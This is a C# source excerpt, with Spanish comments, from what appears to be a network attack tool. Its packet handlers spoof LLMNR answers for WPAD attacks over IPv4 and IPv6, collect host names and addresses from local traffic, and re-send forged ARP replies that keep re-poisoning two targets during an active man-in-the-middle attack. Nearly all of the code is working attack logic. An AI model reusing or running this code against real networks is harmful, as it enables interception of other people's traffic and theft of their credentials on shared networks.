private void AnalyzeLLMNR(Packet packet)
{
if (!(packet is EthernetPacket))
{
return;
}
// IPv4 y IPv6
if (packet.PayloadPacket.PayloadPacket is UdpPacket)
{
// Respuestas de LLMNR. De aqui podemos capturar el nombre.
if ((((UdpPacket)(packet.PayloadPacket.PayloadPacket)).SourcePort == 5355) && (((EthernetPacket)packet).Type == EthernetPacketType.IpV4))
{
LLMNR.LLMNRAnswer LLMNRAnswer = new LLMNR.LLMNRAnswer(packet.PayloadPacket.PayloadPacket.PayloadData);
// Solo lo cojemos las respuestas que son de tipo PTR o de tipo A
if (LLMNRAnswer.isPtrResponse == true && LLMNRAnswer.computerName != string.Empty)
{
Neighbor neighbor = Program.CurrentProject.data.GetNeighbor(((EthernetPacket)(packet)).SourceHwAddress);
if (neighbor == null)
{
neighbor = new Neighbor();
neighbor.computerName = LLMNRAnswer.computerName;
neighbor.AddIP(LLMNRAnswer.ipAddress);
neighbor.physicalAddress = ((EthernetPacket)(packet)).SourceHwAddress;
Program.CurrentProject.data.AddNeighbor(neighbor);
NewNeighbor(this, new NeighborEventArgs(neighbor));
}
else
{
neighbor.computerName = LLMNRAnswer.computerName;
Program.CurrentProject.data.AddNeighbor(neighbor);
}
}
}
if ((((EthernetPacket)packet).Type == EthernetPacketType.IpV4) && (((UdpPacket)(packet.PayloadPacket.PayloadPacket)).DestinationPort == 5355))
{
SynchronizedCollection <Attack> lstAttacks = Program.CurrentProject.data.GetAttacks();
// En caso de MITM ARP -> Si el equipo está intentando restablecer su tabla ARP ... se le vuelve a envenenar
foreach (Attack attk in lstAttacks.Where(A => A.attackType == AttackType.WpadIPv4 && A.attackStatus == AttackStatus.Attacking))
{
MitmAttack mitmAtt = (MitmAttack)attk;
if (((IPv4Packet)((EthernetPacket)packet).PayloadPacket).SourceAddress.Equals(mitmAtt.t2.ip))
{
WpadIPv4Attack.Instance.GenerateLLMNRResponse(packet);
}
}
}
if ((((EthernetPacket)packet).Type == EthernetPacketType.IpV6) && (((UdpPacket)(packet.PayloadPacket.PayloadPacket)).DestinationPort == 5355))
{
SynchronizedCollection <Attack> lstAttacks = Program.CurrentProject.data.GetAttacks();
// En caso de MITM ARP -> Si el equipo está intentando restablecer su tabla ARP ... se le vuelve a envenenar
foreach (Attack attk in lstAttacks.Where(A => A.attackType == AttackType.WpadIPv6 && A.attackStatus == AttackStatus.Attacking))
{
MitmAttack mitmAtt = (MitmAttack)attk;
if (((IPv6Packet)((EthernetPacket)packet).PayloadPacket).SourceAddress.Equals(mitmAtt.t2.ip))
{
WpadIPv6Attack.Instance.GenerateLLMNRResponse(packet);
}
}
}
}
}
private void AnalyzeARP(Packet packet)
{
if (!(packet.PayloadPacket is ARPPacket))
{
return;
}
if (!(packet is EthernetPacket))
{
return;
}
EthernetPacket ethernet = (EthernetPacket)packet;
ARPPacket arp = (ARPPacket)packet.PayloadPacket;
// Si el paquete va dirigido a nuestra MAC...
if (ethernet.DestinationHwAddress.Equals(localPhysicalAddress))
{
PhysicalAddress mac = arp.SenderHardwareAddress;
IPAddress ip = arp.SenderProtocolAddress;
Neighbor neighbor = Program.CurrentProject.data.GetNeighbor(mac);
if (neighbor == null)
{
// Creamos el vecino
neighbor = new Neighbor();
neighbor.physicalAddress = mac;
neighbor.AddIP(ip);
Program.CurrentProject.data.AddNeighbor(neighbor);
NewNeighbor(this, new NeighborEventArgs(neighbor));
}
else
{
// Si ya existe, comprobamos si tiene la iP ipv4 y se la añadimos (en caso de que lo la tenga)
if (!neighbor.ExistsIP(ip))
{
neighbor.AddIP(ip);
Program.CurrentProject.data.AddNeighbor(neighbor);
}
}
}
// Si va dirigido a broadcast ...
else if (ethernet.DestinationHwAddress.Equals(PhysicalAddress.Parse("FF-FF-FF-FF-FF-FF")))
{
// Si los que están "negociando" las tablas ARP están siendo atacados por un MITM,
// se les vuelve a atacar envenenando sus tablas
if (arp.Operation == ARPOperation.Request)
{
PhysicalAddress senderMac = arp.SenderHardwareAddress;
PhysicalAddress destinationMac = arp.TargetHardwareAddress;
IPAddress senderIp = arp.SenderProtocolAddress;
IPAddress destinationIp = arp.TargetProtocolAddress;
SynchronizedCollection <Attack> lstAttacks = Program.CurrentProject.data.GetAttacks();
// En caso de MITM ARP -> Si el equipo está intentando restablecer su tabla ARP ... se le vuelve a envenenar
foreach (Attack attk in lstAttacks.Where(A => (A.attackType == AttackType.ARPSpoofing || A.attackType == AttackType.InvalidMacSpoofIpv4) && A.attackStatus == AttackStatus.Attacking))
{
if (attk is MitmAttack)
{
MitmAttack mitmArp = (MitmAttack)attk;
if (
((mitmArp.t1.ip.Equals(senderIp)) || (mitmArp.t1.ip.Equals(destinationIp)))
&&
((mitmArp.t2.ip.Equals(senderIp)) || (mitmArp.t2.ip.Equals(destinationIp)))
)
{
// Lo envia a ambas partes del ataque, se vuelve a envenenar a los dos equipos
// (aunque unicamente sería necesario al que hace la solicitud (request)
ethernet = Attacks.ARPSpoofing.GenerateResponseArpPoison(device.Interface.MacAddress,
((MitmAttack)mitmArp).t2.mac,
((MitmAttack)mitmArp).t2.ip,
((MitmAttack)mitmArp).t1.ip);
Program.CurrentProject.data.SendPacket(ethernet);
ethernet = Attacks.ARPSpoofing.GenerateResponseArpPoison(device.Interface.MacAddress,
((MitmAttack)mitmArp).t1.mac,
((MitmAttack)mitmArp).t1.ip,
((MitmAttack)mitmArp).t2.ip);
Program.CurrentProject.data.SendPacket(ethernet);
}
}
else if (attk is InvalidMacSpoofAttackIpv4Attack)
{
ethernet = Attacks.ARPSpoofing.GenerateResponseArpPoison(device.Interface.MacAddress,
((InvalidMacSpoofAttackIpv4Attack)attk).t2.mac,
((InvalidMacSpoofAttackIpv4Attack)attk).t2.ip,
((InvalidMacSpoofAttackIpv4Attack)attk).t1.ip);
Program.CurrentProject.data.SendPacket(ethernet);
}
}
}
}
OnNewARP(new ArpEventArgs(packet));
}